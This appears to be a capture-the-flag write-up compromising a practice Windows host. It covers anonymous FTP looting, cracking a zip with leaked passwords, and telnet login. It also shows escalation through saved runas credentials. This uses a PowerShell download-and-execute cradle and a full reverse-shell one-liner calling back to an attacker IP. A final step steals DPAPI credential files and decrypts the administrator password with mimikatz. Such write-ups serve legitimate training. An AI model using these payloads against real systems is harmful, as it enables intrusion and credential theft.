Enumeration
Defining a helper variable containing the IP and doing some basic enumeration:
export ip=10.10.10.98
ping $ip # ttl 127
nmap -sC -sV $ip -p-
| Port | Service | Notes |
|---|---|---|
| 21 | ftp | Microsoft ftpd Anon Allowed |
| 23 | telnet? | |
| 80 | http | Microsoft IIS httpd 7.5, MegaCorp, Trace |
| Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows |
Ftp
Anonymous allowed so easy to login
ftp $ip # anonymous / nopass
cd Backups
type binary
get backup.mdb
cd Engineer
get Access\ Control.zip
backup.mdb appears to be a Microsoft access database. Trying mdbtools to open it
mdb-tables backup.mdb | grep user
mdb-export backup.mdb auth_user
Returns:
| id | username | password | Status | last_login | RoleID | Remark |
|---|---|---|---|---|---|---|
| 25 | “admin” | “admin” | 1 | “08/23/18 21:11:47” | 26 | |
| 27 | “engineer” | “access4u@security” | 1 | “08/23/18 21:13:36” | 26 | |
| 28 | “backup_admin” | “admin” | 1 | “08/23/18 21:14:02” | 26 |
Trying these passwords out with unzipping Access\ Control.zip yields a result:
7z x Access\ Control.zip -paccess4u@security
# Access Control.pst
file Access\ Control.pst
# Microsoft Outlook Personal Storage
readpst Access\ Control.pst
# Access Control.mbox
cat Access\ Control.mbox
# The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
Telnet
The recovered credentials from the mailbox works for the telnet service
telnet #ip
login: security
password: 4Cc3ssC0ntr0ller
whoami
# access\security
type Desktop\user.txt
Privilege Escalation
There is a shortcut on the Public desktop which shows that runas can be evoked with saved credentials. This can be used to invoke powershell as administrator with a remote shell payload:
type ..\Public\Desktop\"ZKAccess3.5 Security System.lnk"
L�F�@ ��7���7���#�P/P�O� �:i�+00�/C:\R1M�:Windows��:��M�:*wWindowsV1MV�System32��:��MV�*�System32X2P�:�
runas.exe��:1��:1�*Yrunas.exeL-K��E�C:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%�
�wN���]N�D.��Q���`�Xaccess�_���8{E�3
O�j)�H���
)ΰ[�_���8{E�3
O�j)�H���
)ΰ[� ��1SPS�XF�L8C���&�m�e*S-1-5-21-953262931-566350628-63446256-500
cmdkey /list
Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator
runas /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.11/shell.ps1')"
Make a reverse shell ps1:
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.11",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Server up over a web server and start a listener
sudo python -m http.server 80
nc -nvlp 4444
Use runas to run the reverse shell as route
runas /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.11/shell.ps1')"
on the reverse listener
whoami
# access\administrator
cat C:\users\Administrator\Desktop\root.txt
Credential Recovery
It’s possible to extract the saved credentials using the Windows Data Protection API. Checking the following paths:
ls -Force C:\Users\security\AppData\Local\Microsoft\Vault
ls -Force C:\Users\security\AppData\Local\Microsoft\Credentials
ls -Force C:\Users\security\AppData\Local\Microsoft\Protect
ls -Force C:\Users\security\AppData\Roaming\Microsoft\Vault
ls -Force C:\Users\security\AppData\Roaming\Microsoft\Credentials
ls -Force C:\Users\security\AppData\Roaming\Microsoft\Protect
Finds System files on the last two paths which may be credentials. These can be converted to base64 for extraction to local examination:
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Users\security\AppData\Roaming\Microsoft\Credentials\51AB168BE4BDB3A603DADE4F8CA81290"))
# AQAAAA4CAAAAAAAAAQAAANCMnd8BFdERjHoAwE/Cl+sBAAAALsOSB6VI40+LQ9k9ZFkFgAAAACA6AAAARQBuAHQAZQByAHAAcgBpAHMAZQAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAIABEAGEAdABhAA0ACgAAABBmAAAAAQAAIAAAAPW7usJAvZDZr308LPt/MB8fEjrJTQejzAEgOBNfpaa8AAAAAA6AAAAAAgAAIAAAAPlkLTI/rjZqT3KT0C8m5Ecq3DKwC6xqBhkURY2t/T5SAAEAAOc1Qv9x0IUp+dpf+I7c1b5E0RycAsRf39nuWlMWKMsPno3CIetbTYOoV6/xNHMTHJJ1JyF/4XfgjWOmPrXOU0FXazMzKAbgYjY+WHhvt1Uaqi4GdrjjlX9Dzx8Rou0UnEMRBOX5PyA2SRbfJaAWjt4jeIvZ1xGSzbZhxcVobtJWyGkQV/5v4qKxdlugl57pFAwBAhDuqBrACDD3TDWhlqwfRr1p16hsqC2hX5u88cQMu+QdWNSokkr96X4qmabp8zopfvJQhAHCKaRRuRHpRpuhfXEojcbDfuJsZezIrM1LWzwMLM/K5rCnY4Sg4nxO23oOzs4q/ZiJJSME21dnu8NAAAAAY/zBU7zWC+/QdKUJjqDlUviAlWLFU5hbqocgqCjmHgW9XRy4IAcRVRoQDtO4U1mLOHW6kLaJvEgzQvv2cbicmQ==
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Users\security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001\0792c32e-48a5-4fe3-8b43-d93d64590580"))
# AgAAAAAAAAAAAAAAMAA3ADkAMgBjADMAMgBlAC0ANAA4AGEANQAtADQAZgBlADMALQA4AGIANAAzAC0AZAA5ADMAZAA2ADQANQA5ADAANQA4ADAAAAAAAAAAAAAFAAAAsAAAAAAAAACQAAAAAAAAABQAAAAAAAAAAAAAAAAAAAACAAAAnFHKTQBwjHPU+/9guV5UnvhDAAAOgAAAEGYAAOePsdmJxMzXoFKFwX+uHDGtEhD3raBRrjIDU232E+Y6DkZHyp7VFAdjfYwcwq0WsjBqq1bX0nB7DHdCLn3jnri9/MpVBEtKf4U7bwszMyE7Ww2Ax8ECH2xKwvX6N3KtvlCvf98HsODqlA1woSRdt9+Ef2FVMKk4lQEqOtnHqMOcwFktBtcUye6P40ztUGLEEgIAAABLtt2bW5ZW2Xt48RR5ZFf0+EMAAA6AAAAQZgAAD+azql3Tr0a9eofLwBYfxBrhP4cUoivLW9qG8k2VrQM2mlM1FZGF0CdnQ9DBEys1/a/60kfTxPX0MmBBPCi0Ae1w5C4BhPnoxGaKvDbrcye9LHN0ojgbTN1Op8Rl3qp1Xg9TZyRzkA24hotCgyftqgMAAADlaJYABZMbQLoN36DhGzTQ
On a windows machine we control:
winget install Git.Git
git clone https://github.com/ParrotSec/mimikatz
cd mimikatszx64
.\mimikatz.exe
[IO.File]::WriteAllBytes("C:\Users\vm\dev\51AB168BE4BDB3A603DADE4F8CA81290",[Convert]::FromBase64String("AQAAAA4CAAAAAAAAAQAAANCMnd8BFdERjHoAwE/Cl+sBAAAALsOSB6VI40+LQ9k9ZFkFgAAAACA6AAAARQBuAHQAZQByAHAAcgBpAHMAZQAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAIABEAGEAdABhAA0ACgAAABBmAAAAAQAAIAAAAPW7usJAvZDZr308LPt/MB8fEjrJTQejzAEgOBNfpaa8AAAAAA6AAAAAAgAAIAAAAPlkLTI/rjZqT3KT0C8m5Ecq3DKwC6xqBhkURY2t/T5SAAEAAOc1Qv9x0IUp+dpf+I7c1b5E0RycAsRf39nuWlMWKMsPno3CIetbTYOoV6/xNHMTHJJ1JyF/4XfgjWOmPrXOU0FXazMzKAbgYjY+WHhvt1Uaqi4GdrjjlX9Dzx8Rou0UnEMRBOX5PyA2SRbfJaAWjt4jeIvZ1xGSzbZhxcVobtJWyGkQV/5v4qKxdlugl57pFAwBAhDuqBrACDD3TDWhlqwfRr1p16hsqC2hX5u88cQMu+QdWNSokkr96X4qmabp8zopfvJQhAHCKaRRuRHpRpuhfXEojcbDfuJsZezIrM1LWzwMLM/K5rCnY4Sg4nxO23oOzs4q/ZiJJSME21dnu8NAAAAAY/zBU7zWC+/QdKUJjqDlUviAlWLFU5hbqocgqCjmHgW9XRy4IAcRVRoQDtO4U1mLOHW6kLaJvEgzQvv2cbicmQ=="))
[IO.File]::WriteAllBytes("C:\Users\vm\dev\0792c32e-48a5-4fe3-8b43-d93d64590580",[Convert]::FromBase64String("AgAAAAAAAAAAAAAAMAA3ADkAMgBjADMAMgBlAC0ANAA4AGEANQAtADQAZgBlADMALQA4AGIANAAzAC0AZAA5ADMAZAA2ADQANQA5ADAANQA4ADAAAAAAAAAAAAAFAAAAsAAAAAAAAACQAAAAAAAAABQAAAAAAAAAAAAAAAAAAAACAAAAnFHKTQBwjHPU+/9guV5UnvhDAAAOgAAAEGYAAOePsdmJxMzXoFKFwX+uHDGtEhD3raBRrjIDU232E+Y6DkZHyp7VFAdjfYwcwq0WsjBqq1bX0nB7DHdCLn3jnri9/MpVBEtKf4U7bwszMyE7Ww2Ax8ECH2xKwvX6N3KtvlCvf98HsODqlA1woSRdt9+Ef2FVMKk4lQEqOtnHqMOcwFktBtcUye6P40ztUGLEEgIAAABLtt2bW5ZW2Xt48RR5ZFf0+EMAAA6AAAAQZgAAD+azql3Tr0a9eofLwBYfxBrhP4cUoivLW9qG8k2VrQM2mlM1FZGF0CdnQ9DBEys1/a/60kfTxPX0MmBBPCi0Ae1w5C4BhPnoxGaKvDbrcye9LHN0ojgbTN1Op8Rl3qp1Xg9TZyRzkA24hotCgyftqgMAAADlaJYABZMbQLoN36DhGzTQ"))
Attempting credential extraction, first importing the credential file then the masterkey into the cache before decryptng the admin password
# Credential File
dpapi::cred /in:C:\Users\vm\dev\51AB168BE4BDB3A603DADE4F8CA81290 /sid:S-1-5-21-953262931-566350628-63446256-1001 /password:4Cc3ssC0ntr0ller
# MasterKey
dpapi::masterkey /in:C:\Users\vm\dev\0792c32e-48a5-4fe3-8b43-d93d64590580 /sid:S-1-5-21-953262931-566350628-63446256-1001 /password:4Cc3ssC0ntr0ller
# Decrypting
dpapi::cred /in:C:\Users\vm\dev\51AB168BE4BDB3A603DADE4F8CA81290
# CredentialBlob : 55Acc3ssS3cur1ty@megacorp
And verifying with telnet
telnet $ip
login: Administrator
password: 55Acc3ssS3cur1ty@megacorp